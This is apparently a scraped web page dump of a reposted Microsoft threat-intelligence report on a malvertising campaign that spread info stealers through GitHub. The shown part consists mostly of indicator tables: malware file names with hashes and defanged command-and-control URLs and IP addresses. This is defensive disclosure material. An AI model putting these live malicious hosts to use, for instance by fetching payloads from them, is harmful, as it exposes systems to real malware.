readability=\"2\">\n<td><em>report.exe<\/em><\/td>\n<td>6daccc09f5f843b1fa4adde64ad282511f591a641cb474e123fed922167df6ae<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>xh6yIa7PXFCsasc0H5.exe<\/em><\/td>\n<td>5f17501193f5f823f419329bc20534461a7195aa4c456e27af6b0df5b0788041<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>yL6Iwcawoz3KDjg60m.exe<\/em><\/td>\n<td>5ecb4240fae36893973fb306c52c7e548308ebcfba6d101aad4e083407968a96<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>CustomsCampbell.exe<\/em><\/td>\n<td>5b80c7d65bb655ccb6e3264f4459a968edcda28084e0ddde16698f642b2d7d83<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>HoldemRover.exe<\/em><\/td>\n<td>4c60cdd1ee4045eb0b3bfda8326802d17565f3d1ff6829ac05775ebc6d9ca2dc<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>QUCvpZLobnhvno5v1t.exe<\/em><\/td>\n<td>4bac608722756c80c29fee6f73949c011ea78243e5267e86b7b20b3beeb79f9e<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>EmilyHaiti.exe<\/em><\/td>\n<td>3221f1356a91d4f06d1deee988be04597cc11bc1cab199ba9c43b9d80dfa88bd<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>PIPIPOO.exe<\/em><\/td>\n<td>15bf7a141a5a5e7e5c19ffbfbb5b781ae8db52d9ba5ffeb1364964580ed55b13<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>ReliefOrganizational.exe<\/em><\/td>\n<td>02533f92d522d47b9d630375633803dd8d6b4723e87d914cd29460d404134a66<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>HelloWorld.ps1<\/em><\/td>\n<td>670218cfc5c16d06762b6bc74cda4902087d812e72c52d6b9077c4c416485<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>251.zip<\/em><\/td>\n<td>0997201124780f11a16662a0d718b1a3ef3202c5153191f93511d7ecd0de4d8d<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>251.exe<\/em><\/td>\n<td>4b50e7fba5e33bac30b98494361d5ab725022c38271b3eb89b9c4aab457dca78<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Fourth-stage AutoIT, NetSupport RAT, PowerShell, and Lumma<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"10\">\n<tr>\n<td><strong>File name(s)<\/strong><\/td>\n<td><strong>SHA-256<\/strong><\/td>\n<\/tr>\n<tr readability=\"6\">\n<td><em>Korea.com<\/em> <br \/><em>Fabric.com<\/em> <br \/><em>Affiliated.com<\/em> <br \/><em>Weeks.com<\/em> <br \/><em>Briefly.com<\/em> <br \/><em>Denmark.com<\/em> <br \/><em>Tanzania.com<\/em> <br \/><em>Cookies.com<\/em> <br \/><em>Spice.com<\/em> <br \/><em>SophieHub.scr<\/em> <br \/><em>SpaceWarp.scr<\/em> <br \/><em>SkillSync.scr<\/em> <br \/><em>Quantify.scr<\/em> <br \/><em>HealthPulse<\/em> <br \/><em>CogniFlow.scr<\/em> <br \/><em>ArgonautGuard.scr<\/em><\/td>\n<td>865347471135bb5459ad0e647e75a14ad91424b6f13a5c05d9ecd9183a8a1cf4<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><em>Warrant.com<\/em> <br \/><em>Ford.com<\/em> <br \/><em>AutoIt3.exe<\/em> <br \/><em>Seq.com<\/em> <br \/><em>Underwear.com<\/em><\/td>\n<td>1300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>Presentationhost.exe<\/em><\/td>\n<td>18df68d1581c11130c139fa52abb74dfd098a9af698a250645d6a4a65efcbf2d<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>erLX7UsT.ps1<\/em><\/td>\n<td>2a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>675aff18abddc.exe<\/em><\/td>\n<td>adf5a9c2db09a782b3080fc011d45eb6eb597d8b475c3c27755992b1d7796e91<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>675aff18abddc.vbs<\/em><\/td>\n<td>5f2b66cf3370323f5be9d7ed8a0597bffea8cc1f76cd96ebb5a8a9da3a1bdc71<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>251.exe<\/em><\/td>\n<td>707a23dcd031c4b4969a021bc259186ca6fd4046d6b7b1aaffc90ba40b2a603b<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Third-stage C2s<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"4.5\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxp:\/\/keikochio[.]com\/staz\/gribs.zip<\/em><\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxp:\/\/keikochio[.]com\/incall.php?=compName=&lt;computer name&gt;<\/em><\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/stocktemplates[.]net\/input.php?compName=&lt;computer name&gt;<\/em><\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td><em>hxxp:\/\/89.23.96[.]126\/?v=3&amp;event=ready&amp;url=hxxp:\/\/188.245.94[.]250:443\/auto\/28cd7492facfd54e11d48e52398aefa7\/251.exe<\/em><\/td>\n<td>&nbsp;C2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Fourth-stage C2s<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"14\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td>45.141.84[.]60<\/td>\n<td>&nbsp;IP address<\/td>\n<\/tr>\n<tr>\n<td>91.202.233[.]18<\/td>\n<td>&nbsp;IP address<\/td>\n<\/tr>\n<tr>\n<td>154.216.20[.]131<\/td>\n<td>&nbsp;IP address<\/td>\n<\/tr>\n<tr>\n<td>5.10.250[.]240<\/td>\n<td>&nbsp;IP address<\/td>\n<\/tr>\n<tr>\n<td>79.132.128[.]77<\/td>\n<td>&nbsp;IP address<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/shortlearn[.]click<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/wrathful-jammy[.]cyou<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/mycomp[.]cyou<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/kefuguy[.]shop<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/lumdukekiy[.]shop<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/lumquvonee[.]shop<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/klipcatepiu0[.]shop<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/gostrm[.]shop<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/ukuhost[.]net<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/silversky[.]club<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/pub.culture-quest[.]shop<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/se-blurry[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/zinc-sneark[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/dwell-exclaim[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/formy-spill[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/covery-mover[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/dare-curbys[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/impend-differ[.]biz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/dreasd[.]xyz<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/ikores[.]sbs<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/violettru[.]click<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/marshal-zhukov[.]com<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/tailyoveriw[.]my<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p><strong>Fourth-stage testing connectivity sites<\/strong><\/p>\n<figure class=\"wp-block-table table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"1\">\n<tr>\n<td><strong>Indicator<\/strong>&nbsp;<\/td>\n<td><strong>Type<\/strong>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/baidu.com<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr>\n<td><em>hxxps:\/\/360.net<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><em>hxxps:\/\/praxlonfire73.live<\/em><\/td>\n<td>URL<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<h2 class=\"wp-block-heading\" id=\"references\">References<\/h2>\n<h2 class=\"wp-block-heading\" id=\"learn-more\">Learn more<\/h2>\n<p>For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog:&nbsp;<a href=\"https:\/\/aka.ms\/threatintelblog\">https:\/\/aka.ms\/threatintelblog<\/a>.<\/p>\n<p>To get notified about new publications and to join discussions on social media, follow us on LinkedIn at <a href=\"https:\/\/www.linkedin.com\/showcase\/microsoft-threat-intelligence\">https:\/\/www.linkedin.com\/showcase\/microsoft-threat-intelligence<\/a>, and on X (formerly Twitter) at&nbsp;<a href=\"https:\/\/x.com\/MsftSecIntel\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/x.com\/MsftSecIntel<\/a>.<\/p>\n<p>Hear more about this discovery and how threat actors in this campaign leverage trusted platforms and advanced techniques to achieve their malicious goals in this episode of the Microsoft Threat Intelligence podcast, hosted by Sherrod DeGrippo: <a href=\"https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence\/39\/notes\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence\/39\/notes<\/a>. To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: <a href=\"https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence\">https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence<\/a>.<\/p>\n<p> READ MORE <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/03\/06\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Microsoft detected a large-scale malvertising campaign in early December 2024 that impacted nearly one million devices globally. The attack originated from illegal streaming websites embedded with malvertising redirectors and ultimately redirected users to GitHub to deliver initial access payloads as the start of a modular and multi-stage attack chain.<br \/>\nThe post Malvertising campaign leads to info stealers hosted on GitHub appeared first on Microsoft Security Blog. READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":58261,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[276],"tags":[5449,1283,6999,10798,357],"class_list":["post-58260","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-microsoft-secure","tag-credential-theft","tag-cryptojacking","tag-living-off-the-land","tag-storm","tag-windows"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Malvertising campaign leads to info stealers hosted on GitHub 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Malvertising campaign leads to info stealers hosted on GitHub 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2025-03-06T17:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-2.webp\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"39 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Malvertising campaign leads to info stealers hosted on GitHub\",\"datePublished\":\"2025-03-06T17:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\\\/\"},\"wordCount\":7214,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github.webp\",\"keywords\":[\"Credential Theft\",\"cryptojacking\",\"living-off-the-land\",\"Storm\",\"Windows\"],\"articleSection\":[\"Microsoft Secure\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\\\/\",\"name\":\"Malvertising campaign leads to info stealers hosted on GitHub 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github.webp\",\"datePublished\":\"2025-03-06T17:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github.webp\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/03\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github.webp\",\"width\":876,\"height\":805},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Credential Theft\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/credential-theft\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Malvertising campaign leads to info stealers hosted on GitHub\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Malvertising campaign leads to info stealers hosted on GitHub 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/","og_locale":"en_US","og_type":"article","og_title":"Malvertising campaign leads to info stealers hosted on GitHub 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2025-03-06T17:00:00+00:00","og_image":[{"url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2025\/03\/image-2.webp","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"39 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Malvertising campaign leads to info stealers hosted on GitHub","datePublished":"2025-03-06T17:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/"},"wordCount":7214,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/03\/malvertising-campaign-leads-to-info-stealers-hosted-on-github.webp","keywords":["Credential Theft","cryptojacking","living-off-the-land","Storm","Windows"],"articleSection":["Microsoft Secure"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/","url":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/","name":"Malvertising campaign leads to info stealers hosted on GitHub 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/03\/malvertising-campaign-leads-to-info-stealers-hosted-on-github.webp","datePublished":"2025-03-06T17:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/03\/malvertising-campaign-leads-to-info-stealers-hosted-on-github.webp","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/03\/malvertising-campaign-leads-to-info-stealers-hosted-on-github.webp","width":876,"height":805},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/malvertising-campaign-leads-to-info-stealers-hosted-on-github\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Credential Theft","item":"https:\/\/www.threatshub.org\/blog\/tag\/credential-theft\/"},{"@type":"ListItem","position":3,"name":"Malvertising campaign leads to info stealers hosted on GitHub"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH 